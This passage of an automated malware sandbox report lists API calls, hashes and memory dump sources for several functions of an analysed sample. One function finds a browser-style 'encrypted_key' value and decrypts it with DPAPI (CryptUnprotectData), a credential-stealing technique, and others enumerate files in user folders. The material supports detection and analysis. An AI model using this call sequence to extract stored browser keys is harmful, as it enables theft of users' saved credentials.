                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen
                                          • String ID:
                                          • API String ID: 367037083-0
                                          • Opcode ID: 82dd4f02e4e2719d7e948d8c80296db565aa0c5dc9fd538131a41f505dda756a
                                          • Instruction ID: 9fef3d53b293020729f57d8175198dd31623e7c75ae7b43c4b573e451bab310d
                                          • Opcode Fuzzy Hash: 82dd4f02e4e2719d7e948d8c80296db565aa0c5dc9fd538131a41f505dda756a
                                          • Instruction Fuzzy Hash: 62411E71E10209ABCB04EFA4D845AFFB7B4AB49304F049429F4167A251EB75BA05CFA1
                                          Function 00E99CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00E999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E999EC
                                            • Part of subcall function 00E999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E99A11
                                            • Part of subcall function 00E999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E99A31
                                            • Part of subcall function 00E999C0: ReadFile.KERNEL32(000000FF,?,00000000,00E9148F,00000000), ref: 00E99A5A
                                            • Part of subcall function 00E999C0: LocalFree.KERNEL32(00E9148F), ref: 00E99A90
                                            • Part of subcall function 00E999C0: CloseHandle.KERNEL32(000000FF), ref: 00E99A9A
                                            • Part of subcall function 00EA8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EA8E52
                                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E99D39
                                            • Part of subcall function 00E99AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E99AEF
                                            • Part of subcall function 00E99AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E94EEE,00000000,?), ref: 00E99B01
                                            • Part of subcall function 00E99AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E99B2A
                                            • Part of subcall function 00E99AC0: LocalFree.KERNEL32(?,?,?,?,00E94EEE,00000000,?), ref: 00E99B3F
                                            • Part of subcall function 00E99B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E99B84
                                            • Part of subcall function 00E99B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E99BA3
                                            • Part of subcall function 00E99B60: LocalFree.KERNEL32(?), ref: 00E99BD3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                          • String ID: $"encrypted_key":"$DPAPI
                                          • API String ID: 2100535398-738592651
                                          • Opcode ID: 153013aeab20c05504dc630441fb6ff2d4f3c26cc4b9640af7de46641742485a
                                          • Instruction ID: 23b1807b57e597110cde6b3153e292f32d7b4b0f2279f2d364033d85089b9c03
                                          • Opcode Fuzzy Hash: 153013aeab20c05504dc630441fb6ff2d4f3c26cc4b9640af7de46641742485a
                                          • Instruction Fuzzy Hash: C5315EB6D10209ABCF04DBE8DC85AEFB7B8AB48304F14551CE905B7242EB349A04CBA1
                                          Function 00EAC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __getptd.LIBCMT ref: 00EAC74E
                                            • Part of subcall function 00EABF9F: __amsg_exit.LIBCMT ref: 00EABFAF
                                          • __getptd.LIBCMT ref: 00EAC765
                                          • __amsg_exit.LIBCMT ref: 00EAC773
                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00EAC797
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                          • String ID:
                                          • API String ID: 300741435-0
                                          • Opcode ID: 976996c51168e837df400f11fc5948274fde2c684aa7f00a00a400dcf18af654
                                          • Instruction ID: 09887da2e952f069ad6ec93edc3b25173111960d716ba639671b2454947cde8b
                                          • Opcode Fuzzy Hash: 976996c51168e837df400f11fc5948274fde2c684aa7f00a00a400dcf18af654
                                          • Instruction Fuzzy Hash: 77F06D32A013009FD721BBB85C0678A33E06F0E724F28614AF414BE1D3DB6479809E96
                                          Function 00EA4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EA8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EA8E0B
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA4F7A
                                          • lstrcat.KERNEL32(?,00EB1070), ref: 00EA4F97
                                          • lstrcat.KERNEL32(?,00BB89B8), ref: 00EA4FAB
                                          • lstrcat.KERNEL32(?,00EB1074), ref: 00EA4FBD
                                            • Part of subcall function 00EA4910: wsprintfA.USER32 ref: 00EA492C
                                            • Part of subcall function 00EA4910: FindFirstFileA.KERNEL32(?,?), ref: 00EA4943
                                            • Part of subcall function 00EA4910: StrCmpCA.SHLWAPI(?,00EB0FDC), ref: 00EA4971
                                            • Part of subcall function 00EA4910: StrCmpCA.SHLWAPI(?,00EB0FE0), ref: 00EA4987
                                            • Part of subcall function 00EA4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00EA4B7D
                                            • Part of subcall function 00EA4910: FindClose.KERNEL32(000000FF), ref: 00EA4B92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                          • String ID:
                                          • API String ID: 2667927680-0
                                          • Opcode ID: 80a0bf55889a675f425470a877b6247c9466de85e3c92f8f4cdf973d856820c6
                                          • Instruction ID: 47a57ce5d29afddaff620bbac7bee6bef36200ec1107b7143ea434ea4e3b1602
                                          • Opcode Fuzzy Hash: 80a0bf55889a675f425470a877b6247c9466de85e3c92f8f4cdf973d856820c6
                                          • Instruction Fuzzy Hash: A821D076A003049BC764F770DC46EEE337CAB99300F404594BA8967185DF75A6C8CB91